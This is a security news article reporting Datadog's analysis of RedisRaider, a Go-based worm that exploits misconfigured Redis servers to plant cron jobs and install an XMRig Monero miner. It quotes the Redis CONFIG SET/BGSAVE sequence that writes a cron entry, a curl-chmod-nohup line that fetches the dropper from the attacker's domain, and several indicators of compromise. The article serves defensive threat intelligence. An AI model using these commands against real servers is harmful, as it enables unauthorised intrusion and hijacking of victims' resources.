RedisRaider Worm Exploits Misconfigured Redis for Cryptojacking

In a recent revelation by Datadog Security Research, a sophisticated cryptojacking campaign has been uncovered that exploits misconfigured Redis servers on Linux. Dubbed RedisRaider, this multi-stage worm-based malware is engineered to propagate across the internet, mine Monero cryptocurrency using XMRig, and evade detection through advanced obfuscation and anti-forensics.

RedisRaider begins with a broad scanning routine, probing the internet for Redis instances on the default port 6379. Once a vulnerable target is found, it checks whether the server is running on Linux. If so, it uses Redis’s SET command to inject a cron job:

“The exploit involves writing a base64-encoded shell script to a Redis key (t), formatted as a cron entry.”

This is followed by a clever use of Redis commands to write the cron job to /etc/cron.d/apache, a directory monitored by cron. The attack includes:

• CONFIG SET dir “/etc/cron.d”
• CONFIG SET dbfilename “apache”
• BGSAVE

“These steps form a common Redis exploitation pattern, which can be mitigated by running Redis in protected mode.”

The payload also includes a 120-second TTL, and self-deletes the key (DEL t) for anti-forensics.

The cron job executes a shell script that downloads the RedisRaider dropper binary to /tmp/mysql:

curl http://a.hbweb[.]icu:8080/uploads/... -o /tmp/mysql
chmod +x /tmp/mysql
nohup /tmp/mysql &

Once executed, the dropper:

• Evaluates system specs (CPU cores, huge page size)
• Drops and launches XMRig
• Initiates a scanning loop to propagate to new targets

“RedisRaider prints a log statement to standard out and begins the initial access procedure… ‘new target: 1.206.244.7:6379, with passwod:” (Misspelling of “password” included in original malware log.)

RedisRaider employs multiple evasion techniques:

• Garble obfuscation: Used during Go compilation to obfuscate function names
• Custom binary packer: Hides the XMRig miner in a non-executable section, unpacks it at runtime
• String obfuscation: XOR-based routines mask sensitive strings and function calls

“Symbols within the binary have been obfuscated with Garble… effectively obscuring the functionality of the malware.”

Using tools like pwndbg, analysts were able to dump the miner payload after the unpacking routine completed in memory.

Beyond Linux malware, RedisRaider’s command-and-control infrastructure was found to host an in-browser Monero miner:

• Domain: a.hbweb[.]icu
• Miner JS loaded from: c.hbweb[.]icu
• Wallet: 41nTqsXxuM8bPENEBDf1YmH9…

This JavaScript-based miner was embedded in a webpage resembling the BICO Global blockchain login interface. When opened, it began mining Monero using moneroocean.stream as the pool.

“This strongly suggests that the threat actor is conducting multiple coordinated cryptojacking campaigns across numerous domains.”

RedisRaider exemplifies how cloud misconfigurations, especially in Redis, can be weaponized for resource hijacking and silent profit. By combining low-level exploitation with sophisticated evasion and obfuscation tactics, this campaign represents a new level of professionalism in cryptojacking malware.

Related Posts:

• RocketMQ Vulnerability Exploited by DreamBus Malware
• Evolving Cryptojacking Campaign Targets Misconfigured Kubernetes Clusters
• Hackers use Youtube server ads hijack the computer to dig Monero
• Report: North Korea was using a malicious program to dig Monero

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy